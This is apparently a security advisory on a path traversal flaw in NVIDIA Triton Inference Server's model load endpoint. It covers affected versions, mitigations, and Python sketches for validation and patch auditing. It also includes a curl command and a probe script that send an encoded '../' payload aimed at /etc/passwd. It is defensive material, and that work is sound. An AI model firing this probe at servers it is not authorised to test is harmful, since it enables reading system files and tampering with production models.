Path Traversal in NVIDIA Triton Inference Server Allows Model Overwrite
Overview
NVIDIA disclosed a high-severity path traversal vulnerability in Triton Inference Server, a widely used platform for deploying and serving AI models at scale. The flaw is in the server's model loading endpoint, which fetches models from a designated model repository. An attacker with network access to the Triton management interface could send a crafted API request to load or unload a model and, by placing directory traversal sequences (e.g., `..%2F` or `..\`) in the model name parameter, break out of the intended model repository directory.
This enabled two primary attack vectors. First, an attacker could read any file on the server's filesystem that the Triton process had permission to access, potentially exfiltrating sensitive configuration files, data, or even the source code of proprietary models. Second, and more critically, an attacker could overwrite arbitrary files, for example replacing a legitimate production model with a malicious or poisoned version. The result could be incorrect inferences, denial of service, or the execution of embedded payloads if the model format supports it.
The vulnerability posed a significant risk to the integrity and confidentiality of MLOps pipelines that rely on Triton.
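To make the failure mode concrete, the following minimal Python sketch shows how a model name containing traversal sequences can resolve outside a repository root when it is joined naively, and how a containment check catches it. This is not Triton's actual code: `MODEL_REPO`, `naive_model_path`, and `is_inside_repo` are hypothetical names chosen for illustration, and POSIX path rules are assumed.

```python
import posixpath
from urllib.parse import unquote

# Hypothetical repository root, used only for illustration.
MODEL_REPO = "/models"


def naive_model_path(model_name: str) -> str:
    """Join a percent-decoded model name onto the repository root with no validation."""
    return posixpath.normpath(posixpath.join(MODEL_REPO, unquote(model_name)))


def is_inside_repo(path: str, repo: str = MODEL_REPO) -> bool:
    """Return True only if the normalized path stays under the repository root."""
    repo = posixpath.normpath(repo)
    path = posixpath.normpath(path)
    # commonpath compares whole path components, so "/models-evil" does not count as "/models".
    return posixpath.commonpath([repo, path]) == repo


if __name__ == "__main__":
    for name in ("my-model", "..%2f..%2f..%2fetc%2fpasswd"):
        resolved = naive_model_path(name)
        print(name, "->", resolved, "| inside repo:", is_inside_repo(resolved))
```

The check above is purely lexical. A real implementation would likely also need to resolve symbolic links (for example with `os.path.realpath`) before comparing paths.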
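Affected Systems
Based on the patch details below, NVIDIA Triton Inference Server container versions earlier than 25.10 should be treated as affected.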
Testing Guide
1. Identify the URL for loading a model on your Triton server. With default settings the HTTP endpoint listens on port 8000 (port 8001 is the gRPC endpoint), e.g., `http://<triton-server>:8000/v2/repository/models/my-model/load`.
2. Using a tool like `curl`, send a POST request with a model name that includes a URL-encoded path traversal sequence pointing to a known file on the server. For example: `curl -X POST http://<triton-server>:8000/v2/repository/models/..%2f..%2f..%2fetc%2fpasswd/load`
3. If the server returns an error message indicating it could not load a model from `/etc/passwd`, or returns a success code, it may be vulnerable. A properly patched server should reject the request as invalid.
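The steps above can be scripted. The sketch below builds the probe URL and applies the same rough heuristic as step 3 to the response. The function names (`build_probe_url`, `looks_vulnerable`, `send_probe`) are hypothetical, the base URL is whatever HTTP address your own server exposes, and the classification is only a heuristic under those assumptions, not a definitive vulnerability check.

```python
import urllib.error
import urllib.request
from urllib.parse import quote


def build_probe_url(base_url: str, target_file: str, depth: int = 3) -> str:
    """Build a load-endpoint URL whose model name climbs `depth` directories."""
    traversal = "../" * depth + target_file.lstrip("/")
    # safe="" forces "/" to be encoded as %2F so the payload stays one path segment.
    encoded = quote(traversal, safe="")
    return f"{base_url.rstrip('/')}/v2/repository/models/{encoded}/load"


def looks_vulnerable(status: int, body: str, target_file: str) -> bool:
    """Heuristic from step 3: a success code, or an error that echoes the target path."""
    return 200 <= status < 300 or target_file in body


def send_probe(url: str, timeout: float = 5.0) -> tuple[int, str]:
    """POST to the probe URL and return (status code, response body)."""
    request = urllib.request.Request(url, data=b"", method="POST")
    try:
        with urllib.request.urlopen(request, timeout=timeout) as response:
            return response.status, response.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:
        # 4xx/5xx responses still carry a body worth inspecting.
        return err.code, err.read().decode("utf-8", "replace")
```

A typical call would pass the result of `send_probe(build_probe_url(base_url, "/etc/passwd"))` to `looks_vulnerable`, together with the same target path.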
Mitigation Steps
1. **Upgrade Triton**: Immediately update the NVIDIA Triton Inference Server to container version 25.10 or a later patched release.
2. **Restrict Network Access**: Ensure the Triton management API is not exposed to untrusted networks (by default Triton serves HTTP on port 8000 and gRPC on port 8001). Use firewall rules to restrict access to authorized administrators and services only.
3. **Principle of Least Privilege**: Run the Triton server process as a dedicated, non-root user with the minimum required filesystem permissions. Mount the model repository read-only if dynamic model loading is not required.
4. **Use an API Gateway**: Place an API gateway with request validation and URL sanitization capabilities in front of the Triton server to filter out malicious path traversal payloads.
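As an illustration of the request validation mentioned in step 4, here is a minimal sketch of a filter a gateway or reverse-proxy hook might apply to the raw request path. The names `fully_decode` and `is_allowed_request` and the allow-list pattern for model names are assumptions made for this example. They are not part of Triton or of any particular gateway product, and the pattern should be adapted to your own naming scheme.

```python
import re
from urllib.parse import unquote

# Assumed policy: model names are plain identifiers (letters, digits, ".", "_", "-").
_ALLOWED_NAME = re.compile(r"[A-Za-z0-9][A-Za-z0-9._-]*")
_REPO_PREFIX = "/v2/repository/models/"
_REPO_PATH = re.compile(r"^/v2/repository/models/(?P<name>.+)/(?:load|unload)$")


def fully_decode(value: str, max_rounds: int = 5) -> str:
    """Percent-decode repeatedly so double-encoded payloads such as %252e are exposed."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            return decoded
        value = decoded
    raise ValueError("too many encoding layers")


def is_allowed_request(raw_path: str) -> bool:
    """Return False for load/unload requests whose model name is not a plain identifier."""
    if not raw_path.startswith(_REPO_PREFIX):
        return True  # other endpoints are out of scope for this filter
    match = _REPO_PATH.match(raw_path)
    if match is None:
        return False  # malformed load/unload path
    try:
        name = fully_decode(match.group("name"))
    except ValueError:
        return False
    if ".." in name:
        return False
    # Slashes, backslashes, and other separators fail the allow-list match.
    return _ALLOWED_NAME.fullmatch(name) is not None
```

An allow-list is used here instead of a block-list of known bad sequences because it fails closed when an unfamiliar encoding or separator appears. Such a filter complements the upgrade in step 1 and does not replace it.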
Patch Details
The vulnerability is addressed in the NVIDIA Triton Inference Server container version 25.10 and later, available from the NVIDIA NGC catalog.
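To audit a fleet for unpatched deployments, a small helper can compare image tags against the fixed release. The sketch below assumes tags follow a `YY.MM` pattern with an optional suffix (for example `25.10-py3`). The names `PATCHED`, `parse_release`, and `is_patched` are hypothetical, and tags that do not follow this pattern need to be checked manually.

```python
import re

# First fixed container release named in this advisory.
PATCHED = (25, 10)


def parse_release(tag: str) -> tuple[int, int]:
    """Extract (year, month) from a tag such as '25.10-py3' or 'image:25.10-py3'."""
    match = re.search(r"(?:^|:)(\d{2})\.(\d{2})(?:-|$)", tag)
    if match is None:
        raise ValueError(f"unrecognized release tag: {tag!r}")
    return int(match.group(1)), int(match.group(2))


def is_patched(tag: str) -> bool:
    """Return True if the tag is at or after the fixed release."""
    return parse_release(tag) >= PATCHED
```

Tags such as `latest` raise `ValueError` instead of being guessed at, so they surface for manual review.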